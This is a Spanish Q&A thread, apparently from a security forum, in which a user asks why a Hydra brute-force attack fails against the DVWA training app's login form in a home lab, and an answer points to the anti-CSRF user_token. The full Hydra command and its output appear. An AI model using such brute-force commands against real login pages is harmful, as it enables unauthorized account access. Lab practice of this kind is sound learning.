No se puede acceder a la aplicación web Damn Vulnerable con Hydra aunque se proporcione la contraseña correcta

2

Tengo VMware Workstation. Estoy ejecutando Metasploitable2 y Damn Vulnerable Web App. Estoy tratando de atacarlo usando Hydra en kali Linux. Para ahorrar tiempo hice una lista de contraseñas muy pequeña e incluí la contraseña real ( password ) en ella.

Aquí está el comando y la salida

user1@kali:~$ hydra -l admin -P '/home/user1/Desktop/easy.txt' 192.168.203.131 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-03-09 22:03:37
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 8 tasks per 1 server, overall 64 tasks, 8 login tries (l:1/p:8), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "aaa" - 1 of 8 [child 0]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "bbb" - 2 of 8 [child 1]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "cccc" - 3 of 8 [child 2]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "ddddd" - 4 of 8 [child 3]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "eee" - 5 of 8 [child 4]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "password" - 6 of 8 [child 5]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "dfsdaf" - 7 of 8 [child 6]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "23456" - 8 of 8 [child 7]
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-03-09 22:04:20

Aquí está el contenido de easy.txt (el aviso password está ahí)

aaa
bbb
cccc
ddddd
eee
password
dfsdaf
23456

¿Por qué no funcionó? Puedo iniciar sesión manualmente en DVWA usando el nombre de usuario: admin y contraseña: contraseña de un navegador web. También el comando tarda un par de minutos en completarse.

    
pregunta Celeritas 10.03.2016 - 07:13
fuente

1 respuesta

3

Si leo la fuente de login.php correctamente (en enlace ) la página sí un cheque para un token anti-CSRF. Si no está allí, obtendrá un redireccionamiento a la página de inicio de sesión. Por lo tanto, deberá incluir ese token en sus intentos.

No lo revelaré por completo, pero busque un parámetro oculto llamado user_token en su página de inicio de sesión.

    
respondido por el Mark Koek 10.03.2016 - 16:10
fuente

Lea otras preguntas en las etiquetas